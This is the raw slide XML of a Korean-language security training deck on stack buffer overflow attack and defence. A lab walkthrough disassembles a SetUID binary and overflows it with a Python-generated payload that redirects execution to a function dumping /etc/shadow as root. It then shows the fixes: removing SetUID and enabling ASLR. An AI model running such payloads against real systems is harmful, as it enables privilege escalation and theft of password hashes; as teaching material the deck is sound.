            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(BOF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>취약점을 가진 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 사용됨을 확인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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 내용을 출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함을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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 힌트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./bof64 AAAA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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수의 시작 주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: 0x0000000000400635 ⇒ BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약점 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>복귀 주소를 조작하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 실행 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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7" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{727D84AA-90AB-4EB7-B278-E4DDF7459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5" y="1398059"/>
            <a:ext cx="403479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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D58818-0FB8-42B4-AB48-3554D670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13" y="3047806"/>
            <a:ext cx="4989449" cy="281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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A528125-FF0A-4A9C-A648-6C05C1C390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367" b="56894"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318251" y="899528"/>
            <a:ext cx="2997200" cy="8802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39A5F22-DB43-4D03-88B5-651588C39286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6301370" y="2457302"/>
          <a:ext cx="4932807" cy="3703407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236843578"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2878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635548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="33046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위에서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strcpy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실행 직후의 스택 구조는 다음과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85868"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38913" name="_x564967160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12EBF08F-9CBE-4E11-BC20-9429D8012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630" y="3075572"/>
            <a:ext cx="3552825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C783DDA-DF65-46EC-9240-900D44B5856C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0BA43B6-A757-4F14-B55A-F621E8A1D6A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EFBF47-2D0F-4850-87A0-9DF7152DABE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화살표: 오른쪽 13">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F6CCCE-BE66-417C-A423-039F4B05EE28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7046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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble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 $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점이 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수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※ 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버퍼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의 시작 주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp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 - 16(0x10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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7" name="Picture 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14AF77C-BB85-48EE-A741-3945FDC05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75" y="936036"/>
            <a:ext cx="5014341" cy="27857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56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E368D99-6D3F-4489-A11B-6A622DFC0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5" b="35736"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497975" y="4108245"/>
            <a:ext cx="4947604" cy="20639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7E60104-4003-4ECA-892D-8CA49033ECAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6321475" y="461749"/>
          <a:ext cx="5340017" cy="5891961"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5340017">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="848009183"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2233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454" marR="41454" marT="11461" marB="114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873759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="56586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함수에서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함수로 진입한 시점의 스택 구조는 다음과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그러므로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tmp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버퍼의 크기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더 긴 문자열을 넘기면 아래와 같이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함수로 복귀할 때 사용되는 주소를 변경시킬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1454" marR="41454" marT="11461" marB="114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848564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="_x564918704">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB62A56-5106-4732-A942-17A4F364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691" y="3862882"/>
            <a:ext cx="3070601" cy="249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7" name="_x564938504">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D06182-F8BD-488A-BBDC-63F3AD814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1" r="131"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6528131" y="993564"/>
            <a:ext cx="3109161" cy="237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DD21F57-1402-4FBE-B2FF-056962736F9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EE55675-A8F8-4E2F-900E-930F6F26EAF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C8D1AF-BF0A-45CE-93C0-3B3C5A977C6C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" name="화살표: 오른쪽 12">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6047B1F9-F462-4312-AEE5-1989BAAF7D68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144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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 실행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./bof64 $(python -c 'print "A"*24+"\x35\x06\x40"‘)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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수의 시작 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0x0000000000400635</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 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인텔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x86 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및 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x64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>아키텍처는 리틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>엔디언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</a:rPr>
              <a:t>(little endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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000" dirty="0"/>
              <a:t>을 사용하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>복귀 주소에 역으로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0x3506400000000000) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력한다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4070331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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8979F9E7-D4D4-4823-98DC-C11837B3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78" y="842130"/>
            <a:ext cx="4945761" cy="2744597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7EB1C4-726B-4F6C-863A-6B565A966529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="518232" y="4172331"/>
          <a:ext cx="4932807" cy="1711135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368581315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749492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="14081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/etc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/shadow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외의 사용자는 접근할 수 없다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783995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46085" name="_x564965576">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD50D22F-5C9F-4AB1-991A-AE7A350AC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5" y="4726843"/>
            <a:ext cx="45942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_x564966080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89101173-22A0-4202-A176-F2AD9B34D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65" y="5242131"/>
            <a:ext cx="3413125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6ED209E0-61F7-41D0-8AA4-527392A4E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197" y="42762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6F02A76-5DC1-47DA-9569-0C049FE31AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6278110" y="434292"/>
          <a:ext cx="4932807" cy="3906393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61157822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049629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="35999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위의 경우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strcpy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직후의 스택 구조는 다음과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그러므로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실행 종료 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0x0000000000400635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bar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함수의 시작 주소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복귀한다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931332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46087" name="_x564893288">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAF4901-2586-4E1D-9D27-DAC7A263B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716" y="1079106"/>
            <a:ext cx="3297023" cy="267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CA5A70-20C7-4B00-9BF3-CC1B3F3C63F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4543284"/>
            <a:ext cx="5616792" cy="194571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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>재실행 및 출력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>내용을 파일에 출력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./bof64 $(python -c 'print "A"*24+"\x35\x06\x40") &gt; 1.txt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명을 입력하여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$ acheck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파일명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173B945A-D41B-48A0-A7DB-8F01DC99CA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2473" y="5036948"/>
            <a:ext cx="5408912" cy="359554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391A830-1CD8-4D18-B2B4-3D8F8E924E25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59602A3-7E10-4F9E-8FF1-4BCC8DD6EED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C01971-F23F-4103-95FA-1CDA044D2814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" name="화살표: 오른쪽 17">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56AF0A1-DD33-438C-B604-98229F633DC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9701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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411A4485-4317-4F31-A74B-0E009D3827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4" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
            <a:ext cx="565945" cy="5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/Training/Unit/Sys/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="44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Buffer Overflow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공격 및 방어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대응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/bof64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파일에는 스택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취약점이 존재한다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오버플로우가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발생하더라도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/etc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/shadow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출력되지 않도록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조치하시오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test / test123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SetUID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제거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u-s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ASLR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활성화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sysctl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 kernel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randomize_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space=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pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A091AA-30F6-4270-8E55-4E599BAF0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8CA05AE-7C1C-425E-A911-D5525EA28A2E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버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1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이용하여 복귀 주소를 조작할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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이용한 복귀 주소 조작에 대응할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B415383-2E2E-4BCE-85C7-5B35E10E2B32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4E1F945-D42A-4F25-B58D-E50A41EB32B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1" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A443AC1F-F004-4379-9D4E-3A82ABE02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82F75C4-5F19-47F6-8EB1-6AAF8693BF3C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F7DF4A-2C59-43D2-9E01-C977F57C8F1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D9C5224-3F64-4BC4-8DE3-421FE378DF1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19855F-303D-42F3-BC9E-336CBFA4E05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화살표: 오른쪽 25">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1920E64-DD82-46FA-83AC-2C0E06899183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72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/Training/Unit/Sys/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1.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접근 권한 설정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4"/>
            <a:ext cx="4432683" cy="18000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/bin/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stty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파일의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소유자를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변경하고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소유자에게는 읽기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쓰기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 권한을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그룹 및 일반에게는 읽기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 권한만 부여하도록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변경하시오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9"/>
            <a:ext cx="4432682" cy="18000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접근 권한 변경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접근권한 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소유자 변경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chown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소유자명 파일명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접근 권한을 설정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endParaRPr lang="ko-KR" altLang="en-US" sz="1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D170DE5-247F-4796-9378-78ED0D38CBC1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73958F9-6BD9-4E0E-96AF-65D9C2D8A6A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3DB03F-B87F-4C0E-86E8-58E011007B6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FC988C73-4747-4CE5-BDB8-35CF92A3F6F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2722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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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bof64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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제 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us- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64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bof64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3) ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A05B8A24-0AD6-437D-9E5E-16BC5C81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14" y="1286850"/>
            <a:ext cx="4085971" cy="693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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87373DF7-8165-4254-A426-601E5AD8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28" y="2788920"/>
            <a:ext cx="4039489" cy="640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F911AFB-14D1-43A0-92BB-DDE8EC1868EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="497685" y="3540329"/>
          <a:ext cx="4932807" cy="2686495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3879104180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004609"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23354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SetUID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제거된 경우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root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권한이 아닌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bof64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실행한 계정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아래의 경우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test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권한으로 실행되므로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/etc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/shadow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접근할 수 없다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098530"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50177" name="_x564840440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA46C84B-BAC3-469D-AFCB-A99AF393A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1" y="4314277"/>
            <a:ext cx="4691063" cy="182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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA22538-687D-4085-8FE9-18C4C1EB99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9990" r="-122"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310085" y="904875"/>
